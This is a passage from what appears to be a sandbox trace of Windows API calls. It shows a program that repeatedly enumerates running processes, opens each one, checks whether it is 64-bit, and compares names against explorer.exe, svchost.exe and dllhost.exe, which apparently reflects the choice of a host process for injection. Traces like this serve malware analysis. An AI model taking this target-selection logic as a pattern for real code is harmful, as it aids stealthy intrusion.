th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0227.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0227.223] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.223] CloseHandle (hObject=0xd8) returned 1 [0227.223] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0227.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0227.224] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.224] CloseHandle (hObject=0xd8) returned 1 [0227.224] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0227.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0227.225] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.225] CloseHandle (hObject=0xd8) returned 1 [0227.225] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0227.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0227.225] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.225] CloseHandle (hObject=0xd8) returned 1 [0227.225] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0227.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0227.226] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.226] CloseHandle (hObject=0xd8) returned 1 [0227.226] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0227.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0227.227] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.227] CloseHandle (hObject=0xd8) returned 1 [0227.227] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0227.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0227.228] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.228] CloseHandle (hObject=0xd8) returned 1 [0227.228] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0227.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0227.228] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.228] CloseHandle (hObject=0xd8) returned 1 [0227.228] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0227.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0227.229] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.229] CloseHandle (hObject=0xd8) returned 1 [0227.229] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0227.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0227.230] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.230] CloseHandle (hObject=0xd8) returned 1 [0227.230] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0227.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0227.230] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.230] CloseHandle (hObject=0xd8) returned 1 [0227.231] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0227.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0227.231] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0227.232] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0227.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0227.232] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0227.233] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0227.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0227.234] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0227.234] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.234] CloseHandle (hObject=0xd8) returned 1 [0227.234] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0227.234] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0227.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0227.235] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.235] CloseHandle (hObject=0xd8) returned 1 [0227.235] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0227.235] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0227.235] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0227.235] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0227.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0227.236] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0227.236] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.236] CloseHandle (hObject=0xd8) returned 1 [0227.236] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0227.237] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.237] CloseHandle (hObject=0xd8) returned 1 [0227.237] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0227.237] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0227.238] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.238] CloseHandle (hObject=0xd8) returned 1 [0227.238] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.238] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0227.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0227.239] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0227.239] CloseHandle (hObject=0xd8) returned 1 [0227.239] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0227.239] CloseHandle (hObject=0xd4) returned 1 [0227.239] Sleep (dwMilliseconds=0x3e8) [0228.252] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0228.254] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0228.255] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0228.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0228.255] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0228.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0228.256] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0228.256] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0228.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0228.257] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0228.257] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0228.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0228.258] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0228.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0228.258] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0228.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0228.259] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0228.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0228.259] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0228.260] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0228.260] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0228.261] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0228.261] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0228.262] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0228.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0228.262] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0228.263] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0228.263] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0228.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0228.264] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.264] CloseHandle (hObject=0xd8) returned 1 [0228.264] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0228.264] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0228.264] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0228.264] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0228.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0228.264] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0228.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0228.265] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.265] CloseHandle (hObject=0xd8) returned 1 [0228.265] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0228.265] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0228.265] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0228.265] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0228.265] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0228.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0228.266] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0228.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0228.266] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.266] CloseHandle (hObject=0xd8) returned 1 [0228.266] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0228.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0228.267] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.267] CloseHandle (hObject=0xd8) returned 1 [0228.267] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0228.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0228.267] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.267] CloseHandle (hObject=0xd8) returned 1 [0228.268] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0228.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0228.268] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.268] CloseHandle (hObject=0xd8) returned 1 [0228.268] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0228.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0228.269] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.269] CloseHandle (hObject=0xd8) returned 1 [0228.269] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, 